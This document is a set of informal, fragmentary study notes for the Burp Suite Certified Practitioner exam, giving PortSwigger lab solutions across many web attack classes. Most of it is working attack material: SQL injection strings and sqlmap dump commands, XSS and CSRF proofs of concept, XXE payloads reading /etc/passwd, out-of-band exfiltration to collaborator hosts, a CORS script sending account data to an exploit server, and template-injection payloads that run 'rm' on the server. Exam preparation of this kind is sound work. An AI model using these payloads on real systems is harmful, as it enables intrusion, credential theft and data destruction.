.

Tutor Tutor

Martin Voelk P.Narendra

(Cyber Allegiance)

Mentor Practitioner

Kurt Picker Shaik.Sharif

Dedicated to :- ROXY PICKER

NOTE (This only for who preparing {BSCP} BurpSuite Certifed Practioner Exam )
SQL injection
1.SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

'+OR+1=1--

2.SQL injection vulnerability allowing login bypass

 administrator'--

3.SQL injection attack, querying the database type and version on Oracle

https://portswigger.net/web-security/sql-injection/cheat-sheet
'+UNION+SELECT+'abc','def'+FROM+dual--
 '+UNION+SELECT+BANNER,+NULL+FROM+v$version--

4.SQL injection attack, querying the database type and version on MySQL and Microsoft

https://portswigger.net/web-security/sql-injection/cheat-sheet
'+UNION+SELECT+'abc','def'#
 '+UNION+SELECT+@@version,+NULL#

5.SQL injection attack, listing the database contents on non-Oracle databases

'+UNION+SELECT+NULL,NULL,NULL--

'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'test',NULL--

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_nam
e='users_dyshki'--
'+UNION+SELECT+username_motymq,+password_djwsqr+FROM+users_dyshki--

{non-oracle DB}
1.'+UNION+SELECT+NULL,NULL,NULL--
2.'+UNION+SELECT+NULL,'text',NULL--
3.'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

4.'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_na
me='users_abcd'--
5.'+UNION+SELECT+username_abcd,+password_abcd+FROM+users_abcd--

6.SQL injection attack, listing the database contents on Oracle

'+UNION+SELECT+'abcd','abcd'+FROM+dual--
'+UNION+SELECT+table_name,NULL+FROM+all_tables--

'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_BQU
DLY'--
'+UNION+SELECT+USERNAME_KOUJQE,+PASSWORD_LQZPIU+FROM+USERS_BQUDLY--

{oracle}
1.'+UNION+SELECT+'abcd','abcd'+FROM+dual--
2.'+UNION+SELECT+table_name,NULL+FROM+all_tables--

3.'+UNION+SELECT+column_name,NULL+FROM+all_table_columns+WHERE+table_name='USERS_a
bcd'--
4.'+UNION+SELECT+USERNAME_abcd,+PASSWORD_abcd+FROM+USERS_abcd--

7.SQL injection UNION attack, determining the number of columns returned by the query

'+UNION+SELECT+NULL,NULL--

'+UNION+SELECT+NULL,NULL,NULL--
8.SQL injection UNION attack, finding a column containing text

'+UNION+SELECT+NULL,NULL,NULL--

'+UNION+SELECT+'qAHeV2',NULL,NULL--
'+UNION+SELECT+NULL,'qAHeV2',NULL--

9.SQL injection UNION attack, retrieving data from other tables

'+UNION+SELECT+NULL,NULL--
 '+UNION+SELECT+'abc','def'--

'+UNION+SELECT+username,+password+FROM+users--

10.SQL injection UNION attack, retrieving multiple values in a single column

'+UNION+SELECT+NULL--
 '+UNION+SELECT+NULL,NULL--

'+UNION+SELECT+'abc',NULL--

'+UNION+SELECT+NULL,'abc'--

'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

11.Blind SQL injection with conditional responses

sqlmap -u 'https://0ab6006604a6bec381c50c1a009600a6.web-security-academy.net/filter?
category=Pets' --batch --cookie='TrackingId=hCdZpm3RIhAjSadp;
session=mvT1WoxfxNWEBiUV5lx28iPm4BatoIiX' --level 2

sqlmap -u 'https://0a5b0057046696ec842c656a00bc00e1.web-security-academy.net/filter?
category=Pets' --batch --cookie='TrackingId=ZFlMm5XiRtbyqhF2;
session=GK2MgwoBJWrr2iapVxUm7FtUUrey2NX3;' --level 2 --dbms=PostgreSQL --dump --
threads=5

sqlmap -u 'URL' --cookie='trackingid= ; session= ;' --level 2 --dbms= --dump --threads=5

{if we dont know dbms till level 2& dbms is appear}

12.Blind SQL injection with conditional errors

sqlmap -u 'https://0add00bf0308b05c80d2081000400038.web-security-academy.net/filter?
category=Gifts' --batch --cookie='TrackingId=e2x1fWjeRRwwGMJj;
session=seHSk6vY7ex1N1LTgNMUyissKFsani43' --level 2
sqlmap -u 'https://0add00bf0308b05c80d2081000400038.web-security-academy.net/filter?
category=Gifts' --batch --cookie='TrackingId=e2x1fWjeRRwwGMJj;
session=seHSk6vY7ex1N1LTgNMUyissKFsani43' --level 2 --dbms=Oracle --dump --threads=5

sqlmap -u 'URL' --cookie='trackingid= ; session= ;' --level 2 --dbms= --dump --threads=5

{if we dont know dbms till level 2& dbms is appear}

13.Visible error-based SQL injection

' AND CAST((SELECT 1) AS int)--

' AND 1=CAST((SELECT 1) AS int)--

' AND 1=CAST((SELECT username FROM users) AS int)--

 ' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--

' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--

14.Blind SQL injection with time delays

x'||pg_sleep(10)--

Conditional time delays

 You can test a single boolean condition and trigger a time delay if the condition is true.

SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN

Oracle
'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual

Microsoft IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'

SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE

PostgreSQL
pg_sleep(0) END

MySQL SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')

15.Blind SQL injection with time delays and information retrieval

sqlmap -u 'https://0aca002a0305766c812852e2006e00bc.web-security-academy.net' --
cookie='TrackingId=CcAxvaAEWazRKNsX; session=5PAqn0elilmn9o7LWv0Ovt1iVsjHQfdO;' --level 2
--batch

sqlmap -u 'https://0aca002a0305766c812852e2006e00bc.web-security-academy.net' --
cookie='TrackingId=CcAxvaAEWazRKNsX; session=5PAqn0elilmn9o7LWv0Ovt1iVsjHQfdO;' --batch -
-level 2 --dbms=PostgreSQL --dump --threads=5

Take the password & login

sqlmap -u 'URL' --cookie='trackingid= ; session= ;' --level 2 --dbms= --dump --threads=5

{if we dont know dbms till level 2& dbms is appear}

16.Blind SQL injection with out-of-band interaction

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"
UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-
COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

17.Blind SQL injection with out-of-band data exfiltration

 TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding
%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||
(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-
COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

18.SQL injection with filter bypass via XML encoding

UNION SELECT username ||'~'||password from users
Extensions > Hackvertor > Encode > dec_entities/hex_entities.

Cross-site scripting
Reflected XSS into HTML context with nothing encoded
2.DOM XSS in document.write sink using source location.search
Right-click and inspect the element, and observe that your random string has been placed inside
an img src attribute.

*in search bar ">

3.DOM XSS in innerHTML sink using source location.search

span id

< img src=1 onerror=alert(1)> give this pay load in search box

4. DOM XSS in jQuery anchor href attribute sink using location.search source
 1. On the Submit feedback page, change the query parameter returnPath to / followed
by a random alphanumeric string.

2.Right-click and inspect the element, and observe that your random string has been placed
inside an a href attribute.

3. Change returnPath to:

javascript:alert(document.cookie)

Hit enter and click "back".

5. DOM XSS in jQuery selector sink using a hashchange event

if u find in main page response hash change ,it vuln

add # after url, & give any heading of the post it will take to that post. its conformation.

#
every time in src u have to change the value to see print function

send to victum payload

6.Reflected XSS into attribute with angle brackets HTML-encoded

 "onmouseover="alert(1)

7.Reflected XSS into a JavaScript string with angle brackets HTML encoded

'-alert(1)-'

8.DOM XSS in document.write sink using source location.search inside a select

element
if you check stock check feature script there is called script but in url u see is product id ,
so can add store id

in here we give store id in url it will reflect in options tag, so to reflect xss we need to
come out from tag

"></select><img%20src=1%20onerror=alert(1)>
 9. DOM XSS in AngularJS expression with angle brackets and double quotes HTML-
encoded

in response u see ng app its vuln

{{$on.constructor('alert(1)')()}}

give it in search search bar

10.Reflected [DOM XSS]

 \"-alert(1)}//

11.Stored [DOM XSS]

<><img src=1 onerror=alert(1)>
12.Exploiting cross-site scripting to steal cookie

*in post comment feild *we give pay load with burp colabrator.,

i take it from here give it to colabrator in session & secrete key cookie modifed

13.Exploiting cross-site scripting to capture passwords

*POST COMMENT FEILD i take the pay load from here

Username:</>

Password:</>

give the colabrator &post it in coment feild,go to colabrator check passwd &username.

14.Exploiting XSS to perform CSRF

post comment feildCHANGE EMEIAL function

sent both too repeter &

past it in post comment field

15.Reflected XSS into HTML context with most tags and attributes blocked

send to repeter
send this to intruder
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
&take the body tag again send to the repeater
%20$$=1

now add events

now create a iframe <iframe src="https://YOUR-LAB-ID.web-security-academy.net/?

search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
16.Reflected XSS into HTML context with all tags blocked except custom ones

/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x

17.Reflected XSS with some SVG markup allowed

similar like question 15

https://YOUR-LAB-ID.web-security-academy.net/?
search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E

18.Reflected XSS in canonical link tag

in head href response is comming

'accesskey='x'onclick='alert(1)

https://YOUR-LAB-ID.web-security-academy.net/?
%27accesskey=%27x%27onclick=%27alert(1)

it worked in onely chrome browser

To trigger the exploit on yourself, press one of the following key combinations:

On Windows: ALT+SHIFT+X

On MacOS: CTRL+ALT+X

On Linux: Alt+X

19.Reflected XSS into a JavaScript string with single quote and backslash escaped
 </script><script>alert(1)</script>

20.Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-
encoded and single quotes escaped

its reflected in var search term

\'-alert(1)//

21.Stored XSS into onclick event with angle brackets and double quotes HTML-encoded
and single quotes and backslash escaped
onclick tracker
 ?&apos;-alert(1)-&apos;

22.Reflected XSS into a template literal with angle brackets, single, double quotes,
backslash and backticks Unicode-escaped

its reflected inside back ticks (``)

${alert(1)}

Cross-site request forgery (CSRF)

1.CSRF vulnerability with no defenses

update email functionality here there is no csrf protection.

2.CSRF where token validation depends on request method

3.CSRF where token validation depends on token being present

engegment tool generate csrf send to clint

4.CSRF where token is not tied to user session

login to 2 difrent accounts

every time CSRF value is changing
if this is not work change http 2 to 1

5.CSRF where token is tied to non-session cookie

copy it pest it in note pad ,do some chenges

<form action="https://0a90006503f7a443816ae00500900090.web-security-
academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="1&#64;g1mail&#46;com" />
<input type="hidden" name="csrf" value="DYpNz3v984opuI0yEILRLy3zEJtsEOKu" />
<input type="submit" value="Submit request" />
</form>

remove the total script tag and add this payload there
in the pay load u add your csrf key & change emial also

6.CSRF where token is duplicated in cookie

.change email&send,refresh browser check its changing or not,

Create a URL that uses this vulnerability to inject a fake csrf cookie into the
victim's browser: /?search=test%0d%0aSet-
Cookie:%20csrf=fake%3b%20SameSite=None
change your lab id

email id change ,engagement tool generate csrf

<form action="https://0a0900e104dc98df803c8acd00e60006.web-security-
academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="hacker123&#64;1&#46;com" />
<input type="hidden" name="csrf" value="fake" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();

/script>

delete all script tag , in that place put the url that u made changes

<form action="https://0a0900e104dc98df803c8acd00e60006.web-security-
academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="hacker123&#64;1&#46;com" />
<input type="hidden" name="csrf" value="fake" />
<input type="submit" value="Submit request" />
</form>

like this & send to victim...

7.sameSite Lax bypass via method override

there is session in POST response ,in the response they did not mention strict or null it
means it s lax,, and in request no csrf,,

if it works

send to victim
8.SameSite Strict bypass via client-side redirect

If a cookie is set with the Samesite-Strict attribute, browsers will not send it in any cross-site
requests,csrf In simple terms, this means that if the target site for the request does not match
the site currently shown In the browser's address bar, it will not include the cookie.

its succsfully redircting to my ac,so creat a simple java script payload

send to victim

9.SameSite Strict bypass via sibling domain

live chat*
1st i created a payload ,to conform its giving reply or not

its conformed,but u also see they dont mention any cookies,

in target tab i noteced some kind of sub domin like this

enter xss pay load check it working

1.

2.

3.

1st url encode ,in 2nd url lo username after put& send to victim

10.CSRF where Referer validation depends on header being present

send to victum

11.CSRF with broken Referer validation

send orginal reqest again & generate csrf poc,

after / put ? mark give referl & send to victim&change email

DOM-based vulnerabilities
1.DOM XSS using web messages

<iframe src="https://0a010018036ca06a806649b100e0004d.web-security-
academy.net/" onload="this.contentWindow.postMessage('<img src=1
onerror=print()>','*')">
2.DOM XSS using web messages and a JavaScript URL

load home page

<iframe src="https://0a010018036ca06a806649b100e0004d.web-security-
academy.net/"
onload="this.contentWindow.postMessage('javascript:print()//http:','*')">
3.DOM XSS using web messages and JSON.parse

<iframe src=https://0aa4005703044440849114c5006000e9.web-security-academy.net/
onload='this.contentWindow.postMessage("{\"type\":\"load-
channel\",\"url\":\"javascript:print()\"}","*")'>
4.[DOM-based open redirection]

add url afther &url=http://example.com

then click go back to url

5.[DOM-based cookie manipulation]

&'><script>print()</script>

then click back to home page

 <iframe src="https://YOUR-LAB-ID.web-security-academy.net/product?
productId=1&'><script>print()</script>"
onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-
academy.net';window.x=1;">

after coformation u need to create above pay load &send to victim.

Cross-origin resource sharing (CORS)

1.CORS vulnerability with basic origin reflection
 Origin: https://example.com

deliver to victim&goto acces log u ll see below like this

take it go to decoder url decode

2.CORS vulnerability with trusted null origin

 <iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="
<script> var req = new XMLHttpRequest(); req.onload = reqListener;
req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
req.withCredentials = true; req.send(); function reqListener() {
location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?
key='+encodeURIComponent(this.responseText); };</script>"></iframe>

modify u r lab id & exploit id, send to victim get access log url decode.

3.CORS vulnerability with trusted insecure protocols

here is a stock check feature & in stock level there is a pop up

there is a sub host feature,

change u r lab & exploit ids

XML external entity (XXE) injection

1.Exploiting XXE using external entities to retrieve files
 <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

&xxe;

2.Exploiting XXE to perform SSRF attacks

 <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is
http://169.254.169.254/ . This endpoint can be used to retrieve data about the instance,
some of which might be sensitive.{why he use ip; know about it}

3.Blind XXE with out-of-band interaction

 <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-
SUBDOMAIN"> ]>

4.Blind XXE with out-of-band interaction via XML parameter entities

 <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-
SUBDOMAIN"> %xxe; ]>

go to colabrator,remember dont change entity.

5.Exploiting blind XXE to exfiltrate data using a malicious external DTD

besically this type of bugs to find,1st we need to host a exploit server in there we create a
file like below

">%eval;%exfil;

&store it after that in burp give exploit server url like below

* %xxe;]>

remove the 1st * in above payload

go colabrator check http ...check in request.

6.Exploiting blind XXE to retrieve data via error messages

<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil

SYSTEM 'file:///invalid/%file;'>"> %eval; %exfil;

store in ur exploit server

 <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>

7.Exploiting XInclude to retrieve files

some of them dont mentionn xml version,so u need to do active scan

like this see there is a xinclude

 <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text"
href="file:///etc/passwd"/></foo>

8.Exploiting XXE via image file upload

its file upload functionality

upload a svg file

 <svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1"
height="200"><image xlink:href="file:///etc/hostname"></image></svg>

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM

"file:///etc/hostname" > ]><svg width="128px" height="128px"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

open imeage in new tab.. last payload is working

Server-side request forgery

1.Basic SSRF against the local server
loopback means loocal host,http://localhost/admin/delete?username=carlos

2.Basic SSRF against another back-end system

select last ip check for 200& again send that to repeater

3.SSRF with blacklist-based input filter

but here there is another one problem,it showing admin panel,in if give after ip admin it
not show,in responce y beacause its encoding & some times it may be double encode url.

4.SSRF with filter bypass via open redirection vulnerability

here not work old cases because it checking path not url,here local host like that bot work,,

control+u to url encode

identification~ 1wst product stock check lo mnki url ledhu adhi path ni
chupistundhi,so &next product lo path dagara open redirectional undhi,dani google
.com ichi confirm chesam,.. now ee next product total path ni stock api kadjha ichi
path place lo ip +admin ivvali &url encode cheyali,

5.Blind SSRF with out-of-band detection

Http Request Smuggling

1.HTTP request smuggling, basic CL.TE vulnerability

here ther is no same orgin policy,Transfer-Encoding: chunked

Content-Length: 25,so i send it to repeter,

the results of active scan,,,

 Content-Length: 6 Transfer-Encoding: chunked 0 G

2.HTTP request smuggling, basic TE.CL vulnerability

1st send the request to httprequest smugle probe,after some time u ll see like this in
target,or dashboard,send the above request 1 to repeter &extesions httprequest
,chouse the type of attack u want to launch,,,,,
change the prefix above get to gpot & remove host start attack

3.HTTP request smuggling, obfuscating the TE header

Extenssion ~Http request smuggler~Smuggle Probe

Extession ~ Http Request Smuggler~ Smuggle attack TE.CL

This is Normal Request
This is Modifed

GPOST& Removed colebrater

G was succefully smuggled

4.HTTP request smuggling, confirming a CL.TE vulnerability via differential responses

send to repeater

Change Request Metof GET to POST

Make Sure it should be in HTTP/1

this is normal request

Transfer-Encoding: chunked 0 GET /404 HTTP/1.1 X-Ignore: X

Send twise u ll see 404

5.HTTP request smuggling, confirming a TE.CL vulnerability via differential responses

extension ~ http request smuggler ~ smuggle probe

extenssion ~ http request smuggler ~ smuggle attack (TE.CL)

this is normal request

changeGET to POST & put 404 & remove burp colabrater

6.Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE
vulnerability

extension ~ http request smuggler ~ smuggle probe

send to repeater
this is normal request

Content-Length: 116 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host:

localhost Content-Type: application/x-www-form-urlencoded Content-Length:
10 x=

send twice
7.Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL
vulnerability

extension ~ http request smuggler ~ smuggle probe

this is normal request

make it HTTP1

change request method GET to POST

normal request

Content-Length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

EXTENSION ~ Http request smuggling~ TE-CL

 admin/delete?username=carlos

8.H2.CL request smuggling

make sure before untick all extensions in burp

normal request

change request method

open REPEATER tab untick content update header,tick the allow http2/ALPN override
 Content-Length: 0 GET /resources HTTP/1.1 Host: YOUR-EXPLOIT-SERVER-
ID.exploit-server.net Content-Length: 5 x=1

modify the request but don't send

 send few times until get 302 responce

change your host till get 302 ,send few times to get that responce.

9.HTTP/2 request splitting via CRLF injection

bar\r\n \r\n GET /x HTTP/1.1\r\n Host: YOUR-LAB-ID.web-security-academy.net
change the path value that non existing

send a lot of times, until the response is 302

take the session cookie & replace in cookie editor

10.HTTP/2 request smuggling via CRLF injection

change request method
0

GET /dddddd HTTP/1.1

X-Ingnore: x
Now send again the home request to repeater

1st send POST request & send GET request too see the response if it get 404 its vuln.
now search anything in search

now send this to repeater

remove unwanted headers like previous

in the browser its showing

now check its working in HTTP/1.1 ,its working

copy all this

remove GET & past here

to find content length mark all request,its 920 soo

make changes to content-length & search also,

take the session replace

11.CL.0 request smuggling

this is home page

send this to repeater

down grade to HTTP/1.1

now change the request method GET to POST

remove unwanted headers

disable the Update Content-Length

here its conformed & now update content length to allow automatic

send 2 or 3 times until get 404

send home page to to repeater

down grade this to HTTP/1.1

add Connection: keep-alive

OS command injection
1.OS command injection, simple case
|whoami,ls,pwd

2.Blind OS command injection with time delays

 ||ping+-c+10+127.0.0.1||

3.Blind OS command injection with output redirection

send any imeage file also to repeter.

||whoami>/var/www/images/output.txt||

filename=output.txt

4.Blind OS command injection with out-of-band interaction

email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

5.Blind OS command injection with out-of-band data exfiltration

email=||nslookup+ whoami .BURP-COLLABORATOR-SUBDOMAIN||

Server-side template injection

1.Basic server-side template injection
in the lab its telling its ERB (Ruby) in real case u need to check all ,

ssti(book.hacktricks.xyz)
encode url{previos was encoding}

<%= system("rm /home/carlos/morale.txt") %>

give system commends &encode url

2.Basic server-side template injection (code context)

 Take a closer look at the "preferred name" functionality.Tornado template. To solve the
lab
add before }} to break content

{% import os %} {{os.system('rm /home/carlos/morale.txt')

blog-post-author-display=user.name}}{%25+import+os+%25}
{{os.system('rm%20/home/carlos/morale.txt')

3.Server-side template injection using documentation

You should try solving this lab using only the documentation. However, if you get really
stuck, you can try finding a well-known exploit by @albinowax that you can use to solve
the lab.

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm

/home/carlos/morale.txt") }

4.Server-side template injection in an unknown language with a documented exploit

${{<%[%'"}}%\ ,
take handlbar pay loads in book .hacktricks .xyz,

wrtz{{#with "s" as |string|}} {{#with "e"}} {{#with split as

|conslist|}} {{this.pop}} {{this.push (lookup string.sub
"constructor")}} {{this.pop}} {{#with string.split as
|codelist|}} {{this.pop}} {{this.push "return
require('child_process').exec('rm /home/carlos/morale.txt');"}}
{{this.pop}} {{#each conslist}} {{#with
(string.sub.apply 0 codelist)}} {{this}}
{{/with}} {{/each}} {{/with}} {{/with}}
{{/with}} {{/with}}

URL encode your exploit and add it as the value of the message parameter
in the URL. The final exploit should look like this, but remember to replace YOUR-LAB-ID
with your own lab ID: {take above pay load go to burp decoder encode url}

https://YOUR-LAB-ID.web-security-academy.net/?
message=wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67
%7c%7d%7d%0d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0d%0a%20%20%20%20
%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74
%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20
%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73
%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d
%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20
%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20
%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68
%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70
%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64
%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%68%6f%6d%65%2f
%63%61%72%6c%6f%73%2f%6d%6f%72%61%6c%65%2e%74%78%74%27%29%3b%22%7d%7d%0d%0a%20
%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20
%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0d%0a%20%20%20
%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62
%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0d%0a%20%20%20%20
%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0d%0a%20%20%20%20%20%20%20%20
%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61
%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20
%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%7b
%7b%2f%77%69%74%68%7d%7d
5.Server-side template injection with information disclosure via user-supplied objects

${{<%[%'"}}%\ ,

django means Jinja2 (Python)

{% debug %}

{{settings.SECRET_KEY}}
{{44}}[[55]]
{{7*'7'}} would result in 7777777

Path traversal
1.File path traversal, simple case

open image in new tab

this is normal request

../../../etc/passwd

2.File path traversal, traversal sequences blocked with absolute path bypass

/etc/passwd

3.File path traversal, traversal sequences stripped non-recursively

 ....//....//....//etc/passwd

4.File path traversal, traversal sequences stripped with superfluous URL-decode

5.File path traversal, validation of start of path

normal request

../../../etc/passwd
/var/www/images/../../../etc/passwd

6.File path traversal, validation of file extension with null byte bypass

normal request

../../../etc/passwd%00.jpg

Access control vulnerabilities

1.Unprotected admin functionality

/robots.txt

/administrator-panel
2.Unprotected admin functionality with unpredictable URL

3.User role controlled by request parameter

here is in post login responce the admin is set to false & 2 session ids , so u can go to cookie
editior change admin false to true,

4.User role can be modified in user profile

5.User ID controlled by request parameter

6.URL-based access control can be circumvented
here is X-Original-URLis identified
now its accessing admin panel

7.Method-based access control can be circumvented{imp}

there is admin &normal user creditionals, login with bith &in there admin have privillage
esscaltion to user feature,take the request,
GET /admin-roles?username=wiener&action=upgrade

8.Multi-step process with no access control on one step

same as above & one change

take this request.

POST /admin-roles HTTP/2

Host: 0a4300880440e0c1810a0813000b00c1.web-security-academy.net
Cookie: session=pVhRljK4Og29RhGGHyVi60kDMqLr3uIW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/118.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: https://0a4300880440e0c1810a0813000b00c1.web-security-academy.net
Dnt: 1
Referer: https://0a4300880440e0c1810a0813000b00c1.web-security-academy.net/admin-
roles
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

action=upgrade&confirmed=true&username=wiener

9.Referer-based access control

Referer: https://0ab400df04030d7c8044c13600660083.web-security-academy.net/admin

Authentication
1.Username enumeration via different responses
1 st brute force username feild
2.2FA simple bypass
 /my-account

3.Password reset broken logic

Please check your email for a reset password link.
here is tokken is not tied to or vallidating user,,,

4.Username enumeration via subtly different responses

user names cp &past

Invalid username or password. cp this sentence in grep extract{dot also should be copies}
like also test feild but in this time grep avvasaram ledhu aanukuntaa

5.Username enumeration via response timing

go to burp & run param miner if u r lucky u identify in some cases,r if u coudent get use
below one to changes ips
X-Forwarded-For

put a long password& select pitch fork in introder

select 2 positions & give usernames

 in there enable responce recived&responce completed,sending sfter introdur in
columns

send that ro repeter] introduer

re arreange ip & select passwd &attack

6.Broken brute-force protection, IP block

This lab is vulnerable due to a logic flaw in its password brute-force protection. To
solve the lab, brute-force the victim's password, then log in and access their account page.

Your credentials: wiener:peter

Victim's username: carlos

[Candidate passwords

{in this lab we have our creditionals & onely know the,victim user name to brute fore
password we do like below}
1st give wrong creditonals,capture that & send to introdure,
like this we need to give,1st our user name & 2nd is victim
1st passwd is own 2nd one wt we have to bruteforce,
create a custmove resorce poll with send requst send once at a time

look in 302 there is in deffrent,,,,show responce in browser...

7.Username enumeration via account lock

the POST /login request to Burp Intruder.

Select the attack type Cluster bomb. Add a payload position to the username
parameter. Add a blank payload position to the end of the request body by clicking Add §
twice. The result should look something like this:
 username=§invalid-username§&password=example§§

On the Payloads tab, add the list of usernames to the first payload set. For the
second set, select the Null payloads type and choose the option to generate 5 payloads. This
will effectively cause each username to be repeated 5 times. Start the attack.
check in length
You have made too many incorrect login attempts. Please try again in 1 minute(s).

Invalid username or password.

we success fully find user name its time to find passwd

8.2FA broken logic

1st login with u r own ac see the functionality

send those bpth request to repeter
look there for 302 responce in attack,
show responce in browser

9.Brute-forcing a stay-logged-in cookie

show responce in browser

10.Offline password cracking

This lab stores the user's password hash in a cookie. The lab also contains an XSS
vulnerability in the comment functionality. To solve the lab, obtain Carlos's stay-logged-
in cookie and use it to crack his password.

Go to one of the blogs and post a comment containing the following stored XSS payload,
remembering to enter your own exploit server ID:

{commment feild xss lo pay load icchi ,access log lo secrete ki ni decode cheyali}

11.Password reset poisoning via middleware

 X-Forwarded-Host

X-Forwarded-Host header is supported and you can use it to point the dynamically
generated reset link to an arbitrary domain

change token with actual once replace it with

12.Password brute-force via password change

WebSockets
1.Manipulating WebSocket messages to exploit vulnerabilities
u ll get pop up

2.Manipulating the WebSocket handshake to exploit vulnerabilities

X-Forwarded-For: 1.1.1.1
3.Cross-site WebSocket hijacking
Web cache poisoning
1.Web cache poisoning with an unkeyed header
send twice the request

send this to param miner guess headers

here is X-Forwarded-Host unhiden feild there

show responce in browser

2.Web cache poisoning with an unkeyed cookie

refresh the page 2 nd time u see in request is diffreance

